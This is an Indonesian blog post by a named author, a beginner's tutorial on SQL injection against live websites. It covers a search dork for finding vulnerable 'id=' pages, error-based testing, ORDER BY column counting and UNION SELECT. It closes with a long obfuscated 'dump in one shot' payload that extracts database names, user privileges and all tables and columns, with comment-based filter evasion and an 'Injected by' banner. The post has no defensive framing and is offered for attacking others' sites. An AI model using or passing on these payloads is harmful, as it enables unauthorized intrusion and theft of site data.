Tutorial SQL Injection(Indonesia)
Assalamualaikum Wr.Wb
Dengan saya Sangka Nanang ingin membagikan ilmu saya. Yaitu bagaimana cara kita melakukan sql injection bagi pemula.
Sebelumnya saya menjelaskan dulu apa itu sql injection
Sql injection adalah : sebuah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah website
Baiklah saya mulai penjelasannya.
Pertama kita harus mencari sebuah web yang vuln terhadap SQLI
Dork : inurl:/index.php?id= site.com
-Kembangin lagi ya guys biar dapat yang vuln-
1. Contoh saya memiliki target web yang rentan terhadap sql : http://www.web.com/index.php?id=1
2. Lalu bagaimana cara kita mengetahui bahwa web tersebut rentan terhadap SQLI ? . Caranya cukup mudah kita hanya menambahkan tanda ' (petik) di parameternya
3. Jadilah seperti ini : http://www.web.com/index.php?id=1' < saya menambahkan tanda ' di parameternya
4. Jika website tersebut terdapat error atau blank maka web tersebut vuln SQLI. Contoh errornya seperti ini : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
5. Jika sudah , kita cari jumlah kolom yang ada di web tersebut. Caranya cukup mudah berikan +order+by+1--+-
6. Contoh : http://www.web.com/index.php?id=1'+order+by+1--+-
7. Lalu kita akan mencari di nomor berapakah website tersebut akan error ketika kita memberikan +order+by+1--+-
8. Kita hanya perlu menaikan angka 1 ke angka" yang berikutnya
9. Contoh : http://www.web.com/index.php?id=1'+order+by+2--+- jika di angka 2 tidak error coba ke angka 3 , jika 3 tidak error coba di angka 4 , jika di angka 4 tidak error tetapi di angka 5 webnya error. Brati jumlah kolomnya ada 4 di karnakan di angka 5 error tetapi di angka 4 error
Selanutnya kita menambahkan +union+select+ pada web tersebut
Contoh :. http://www.web.com/index.php?id=-1'+union+select+1,2,3,4--+-
Alasan saya memberikan angka 1 sampe 4 di waktu saya union select . Karna di sesuaikan sama jumlah kolom yang kita cari di order by tadi berapa. Berhubung tadi saya error di 5 berarti di hanya di 4 saja. Maka saya memberikan angka 1 sampai 4 saja
Jangan lupa bahwa di union select kita perlu menambahkan tanda - (men) di belakang sama dengan (=) jadilah seperti ini : http://www.web.com/index.php?id=-1+union+select+1,2,3,4--+-
10. Dan munculah angka togel yang berada di web tersebut. Entah itu nomor 2 atau 3 . Pilihlah salah satu nomor yang mau kalian pilih . Disini saya akan memilih angka 2 , di angka 2 itulah kita akan memberikan dios.
Apa itu dios ?
Dios adalah : DIOS merupakan singkatan dari DUMP IN ONE SHOT. Maksud dari teknik ini adalah memunculkan seluruh isi database dalam satu queri saja.
11. Disini saya akan memberikan dios ke nomor yang muncul pada web yang barusan kita pilih. Berhubung gw milih angka 2 maka kita perlu menghapus angka 2 di url kita tadi
Contoh : http://www.web.com/index.php?id=-1+union+select+1,paste diosnya,3,4--+-
Contoh : http:///www.web.com/index.php?id=-1+union+select+1,/*!50000cOncat/**Darknet-Haxor**/*/(0x223e273e3c2f7469746c653e,0x3c703e3c62723e3c63656e7465723e3c6120687265663d2223223e3c696d67207469746c653d22556e645f5822207372633d2268747470733a2f2f6a2e746f7034746f702e696f2f705f3230303434386f3977302e67696622206865696768743d22313530222077696474683d22313530222f3e3c2f613e3c2f703e3c62723e3c666f6e7420636f6c6f723d22626c61636b223e3c693e3a3a496e6a6563746564206279203a3a20535f410a,0x3c2f623e3c2f666f6e743e3c62723e3c62723e,0x3c666f6e7420636f6c6f723d22626c61636b222066616d696c79203d2022636f7572696572206e6577223e,0x56455253494f4e3a3a20,/*!50000VerSiOn/**Darknet-Haxor**/*/(),0x3c62723e,0x555345523a3a20,/*!50000UsEr/**Darknet-Haxor**/*/(),0x3c62723e,0x44415441424153453a3a20,/*!50000DaTabaSe/**Darknet-Haxor**/*/(),0x3c62723e,0x3c62723e,0x544f54414c2044415441424153453a3a20,0x3c62723e,(SeLECT(@w)/*!50000FrOM/**Darknet-Haxor**/*/(/*!50000SeLECT/**Darknet-Haxor**/*/(@w:=0x00) ,(SeLECT(@w)/*!50000FrOM/**Darknet-Haxor**/*/(/*!50000InFOrMATIoN_SChEmA/**Darknet-Haxor**/*/.SCheMaTA)/*!50000WhErE/**Darknet-Haxor**/*/(@w)IN(@w:=/*!50000CoNCaT/**Darknet-Haxor**/*/(0x20,@w,0x3c666f6e7420636f6c6f723d22626c61636b223e3d3d3d3d3e203c2f666f6e743e,/*!50000sCheMa_NaMe/**Darknet-Haxor**/*/,0x3c62723e))))w),0x3c62723e,0x3c62723e,0x555345522050524956494c4547453a3a20,0x3c62723e,(SeLECT(@z)/*!50000FrOM/**Darknet-Haxor**/*/(/*!50000SeLECT/**Darknet-Haxor**/*/(@z:=0x00) ,(SeLECT(@z)/*!50000FrOM/**Darknet-Haxor**/*/(/*!50000INFOrmATiON_SChEmA/**Darknet-Haxor**/*/.UsER_PRIViLEgES)/*!50000WhERE/**Darknet-Haxor**/*/(@z)IN(@z:=/*!50000CoNCaT/**Darknet-Haxor**/*/(0x20,@z,0x3c666f6e7420636f6c6f723d22626c61636b223e3d3d3d3e203c2f666f6e743e,GrANtEE,0x202d3e20,Is_gRANTaBLE,0x3c62723e))))z),0x3c2f666f6e743e,0x3c62723e,0x3c62723e,0x3c666f6e7420636f6c6f723d22626c61636b223e204920616d20436c6f776e203c2f666f6e743e3c62723e,(selEct(@x)/*!50000fRom/**Darknet-Haxor**/*/(/*!50000sElect/**Darknet-Haxor**/*/(@x:=0x00),(sElect(0)/*!From/**Darknet-Haxor**/*/(/*!50000inforMation_schEma.coLuMns/**Darknet-Haxor**/*/)/*!50000Where/**Darknet-Haxor**/*/(taBle_schema=/*!50000DatAbase/**Darknet-Haxor*/*/())and(0x00)in(@x:=/*!50000coNcat/**Darknet-Haxor**/*/(@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22726564223e205441424c45203a3a20203c2f666f6e743e,0x3c666f6e7420636f6c6f723d22626c61636b223e,/*!50000tAble_naMe/**Darknet-Haxor**/*/,0x3c666f6e7420636f6c6f723d22626c61636b223e203d3d203c666f6e7420636f6c6f723d2262726f776e223e,/*!50000colUmn_naMe/**Darknet-Haxor**/*/))))x)),3,4--+-
Dann bombbb maka akan munculah nama" database yang ada di dalam web tersebut.
Sekian dari saya terimakasih.
Jika ada kurang jelasnya saya mohon maaf.
Anda bisa dm saya bila tidak paham.
Instagram : @Sangka_Kpm
Komentar
Posting Komentar